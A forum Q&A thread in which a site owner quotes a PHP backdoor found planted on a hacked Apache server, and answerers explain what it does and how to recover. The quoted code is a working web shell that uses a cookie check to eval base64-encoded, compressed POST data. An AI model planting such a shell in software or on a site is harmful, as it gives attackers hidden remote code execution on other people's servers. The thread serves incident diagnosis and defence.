PHP code help - hacked apache server

Question

I have discovered the following code appear in two identical .php files on more than one of my server's websites. The files have inconspicuous names such as "reminder.php" (but a different name everytime) and appear in my /scripts/ and /uploads/ folders, sometimes other folders instead.

Their appearance is not entirely random but I don't know enough about Apache servers or PHP to know a) how it got there b) what it does.

Checking the logs they all appeared at similar times and were called once and that is all.

Any help would be greatly appreciated.

if (isset($_COOKIE["adm"])) {
    if (isset($_POST['crc'], $_POST['cmd'])) {
        if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
            eval(gzuncompress(base64_decode($_POST['cmd'])));
        } else 
            echo "repeat_cmd";
    }
}

Answer 1

The file allows malicious person(s) to execute any PHP code they want on your system.

Basically, if certain validations have been met (i.e. the malicious person has that given cookie value), it will take the POSTed "cmd", base64 decode it, gzip uncompress it, and evaluate it as PHP.

I'd recommend changing your passwords, and maybe reinstalling apache for good measure. Remove these files immediately as well, or if at all remotely possible, restore from a backup.

Answer 2

This code will execute (on the server) any arbitrary code it finds in the POST request if the key adm is present in the client's cookie. That request will be Base-64 encoded and encrypted to obfuscate its contents. Any code at all may be executed, including one to format your hard drive (if your PHP server is set to allow that).

You have been hacked. Take the server offline, right now. Get some help running an analysis before you wipe your host, if you can - you don't want to reinstall and go online, just to get hacked again. Changing all your passwords and locking down your server is a good start.